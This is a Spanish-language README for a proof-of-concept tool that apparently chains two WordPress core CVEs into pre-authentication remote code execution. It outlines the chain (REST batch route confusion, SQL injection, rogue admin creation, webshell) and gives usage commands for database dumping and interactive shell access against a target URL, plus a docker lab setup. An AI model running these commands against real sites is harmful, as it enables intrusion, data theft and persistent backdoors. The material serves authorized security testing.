
PoC de RCE de pre-autenticación para CVE-2026-63030 / CVE-2026-60137 (núcleo de WordPress)
PoC de RCE pre-autenticación para CVE-2026-63030 + CVE-2026-60137 (núcleo de WordPress).
Confusión de ruta REST /batch/v1 → SQLi WP_Query author__not_in → creación de administrador no autenticado → webshell. Archivo único, solo stdlib de Python.
Vulnerabilidad: Adam Kues (Searchlight Cyber). Afectadas: 6.9.0–6.9.4, 7.0.0–7.0.1. Corregidas: 6.9.5 / 7.0.2.
python3 WordPresShell.py check http://target # confirm (non-destructive)
python3 WordPresShell.py dump http://target [--query "SELECT @@version"]
python3 WordPresShell.py shell http://target --cmd "id" # crack-free RCE
python3 WordPresShell.py shell http://target -i # interactive
python3 WordPresShell.py shell http://target --user U --password P --cmd id
docker compose up -d # WordPress 7.0.1 on :8092
docker compose down -v # teardown
shell crea un administrador y deja una webshell — elimina ambos después de las pruebas. Solo pruebas autorizadas.